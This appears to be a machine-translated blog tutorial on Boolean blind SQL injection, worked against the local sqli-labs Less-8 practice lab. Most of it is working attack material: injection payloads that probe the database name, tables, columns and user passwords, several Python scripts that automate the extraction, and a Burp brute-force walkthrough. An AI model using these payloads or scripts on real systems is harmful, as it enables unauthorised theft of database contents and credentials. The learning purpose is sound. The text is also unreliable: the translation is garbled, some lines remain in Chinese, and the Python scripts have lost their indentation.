Introduction: learning through the front nine before turning to echo injection methods such as injection error, this time to study in detail the Boolean blinds .
First, let's look at the concept of blind
Injection is a blind, refers to the value returned by the database without knowledge of the case where the content data to guess, embodiment SQL injection.
Boolean blinds
Principle:
the injection time will return True和False
, so the blinds is based on Boolean page displays the True还是False
information in the database guess.
Boolean blinds need several auxiliary functions, first take a look at these functions
length()函数可返回字符串的长度
substring()函数可以截取字符串,可指定开始的位置和截取的长度
ord()函数可以返回单个字符的ASCII码
char()函数可将ASCII码转换为对应的字符
Specific usage can refer to the blog Gangster Mysql syntax description , then on through sql-labs exercises Boolean blinds.
Analyzing the injection point (i.e. closed symbols)
is found entered id=1'
being given
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'
In id=1'
later add comment symbol and then the echo is correct, it is determined that the sign is closed'
Database burst lengths
know after closing symbols, let's look at the length of the burst of database name, here used in the above mentioned function
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())>1 --+
Echo correct
injected by hand, then we should try over and over again, increasing the length of the back of the conclusion that the length of the database name8
Explosion database name
to know the length of the database name, then on to blast the database name
Less-8/?id=1' and ord(substr(database(),1,1))>99 --+
Less-8/?id=1' and ascii(substr((database()),1,1)) > 99 --+
Less-8/?id=1' and ascii(substr((database()),1,1)) = 99 --+
Principles are the same, the purpose is to remove the database name of a character by comparing the ascii code to guess the name of the database, but if you manually burst, then a waste of time, you can write 脚本
, can also be used burp爆破
, here are two ways to try
Blasting burp
first capture
set the variable, there is provided a box above two variables so to choose 第四个选项
the first variable is set to numbers
1-8, the second variable is also set to numbers
0 to 127
are set up, and start blasting.
But too slow, there should be a problem I burp set here to learn about this method, blasting or script come.
Attach Gangster blog use burp blind
script blasting
the current script will not write, you learn about reference Gangster
Gangster blog Boolean blind
script some do not understand the syntax to refer to the following Gangster blog
Python Requests
Python - - entry (def function definition function)
formatted output string
import requests
def database_len():
for i in range(1,10):
url = '''http://127.0.0.1/sqli-labs-master/Less-8/index.php'''
payload = '''?id=1' and length(database())>%s''' %i #格式化输出字符串
# print(url+payload+'%23')
r = requests.get(url+payload+'%23')
if 'You are in' in r.text:
print(i)
else:
#print('false')
print('database_length:',i)
break
database_len()
def database_name():
name = ''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" %(j,i)
# print(url+'%23')
r = requests.get(url+'%23')
if 'You are in' in r.text:
name = name+i
print(name)
break
print('database_name:',name)
database_name()
Broke database name and length, then change the payload broke the table name
payload:
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>90 --+
Modify the script
import requests
def table_name():
name = ''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1)))=ord('%s')" %(j,i)
# print(url+'%23')
r = requests.get(url+'%23')
if 'You are in' in r.text:
name = name+i
print(name)
break
print('table_name:',name)
table_name()
By modifying limit 0,1
to obtain additional table
burst column names
payload:
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))>100 --+
Modify the script ran out of column names
import requests
def column_name():
name = ''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),%d,1)))=ord('%s')" %(j,i)
# print(url+'%23')
r = requests.get(url+'%23')
if 'You are in' in r.text:
name = name+i
print(name)
break
print('column_name:',name)
column_name()
Other changes limit
value can be derived after the other column name
Burst value
?id=1' and (ascii(substr(( select password from users limit 0,1),1,1)))=68--+
And also the same script above, just change the next payload, but the script is flawed, that is, to traverse , but we assign i
only characters lowercase, uppercase or there may be other special characters do not show up, just add on the line. But to do so will be very slow to run scripts, or to learn python, write a more convenient.
To sum up the blinds commonly used Boolean statements
Database burst length
?id=1' and (length(database()))>1 --+
Explosion database name
?id=1' and (ascii(substr(database(),1,1)))>1 --+
Burst table
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>1 --+
Explosion column names
?id=1' and (ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)))>1 --+
Burst value
?id=1' and (ascii(substr(( select password from users limit 0,1),1,1)))>1--+
Almost the same sentence, we can change them as needed, this time to learn Boolean blinds, then blind study time.